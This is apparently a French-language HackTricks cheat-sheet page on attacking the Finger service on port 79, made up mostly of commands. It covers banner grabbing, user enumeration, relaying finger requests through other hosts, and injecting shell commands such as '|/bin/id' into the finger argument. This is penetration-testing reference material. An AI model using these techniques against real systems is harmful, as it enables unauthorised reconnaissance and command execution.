hacktricks/network-services-pentesting/pentesting-finger.md

5.3 KiB

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Configuration instantanément disponible pour l'évaluation des vulnérabilités et le pentesting. Réalisez un pentest complet depuis n'importe où avec plus de 20 outils et fonctionnalités allant de la reconnaissance au reporting. Nous ne remplaçons pas les pentesters - nous développons des outils personnalisés, des modules de détection et d'exploitation pour leur redonner du temps pour approfondir, pop des shells et s'amuser.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Informations de base

Le programme/service Finger est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le nom d'utilisateur, le nom complet, et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires peuvent comprendre le lieu de bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que le mail a été lu par l'utilisateur, et le contenu des fichiers de plan et de projet de l'utilisateur.

Port par défaut : 79

PORT   STATE SERVICE
79/tcp open  finger

Énumération

Capture de bannière/Connexion de base

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Énumération des utilisateurs

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativement, vous pouvez utiliser finger-user-enum de pentestmonkey, quelques exemples :

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap exécute un script en utilisant des scripts par défaut

Metasploit utilise plus de trucs que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Exécution de commande

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Utiliser un système comme relais finger

finger user@host@victim
finger @internal@external

Configuration instantanément disponible pour l'évaluation des vulnérabilités et le pentesting. Réalisez un pentest complet de n'importe où avec plus de 20 outils et fonctionnalités allant de la reconnaissance au reporting. Nous ne remplaçons pas les pentesters - nous développons des outils personnalisés, des modules de détection et d'exploitation pour leur redonner du temps pour approfondir, exploiter des failles et s'amuser.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} Apprenez et pratiquez le Hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le Hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks
{% endhint %}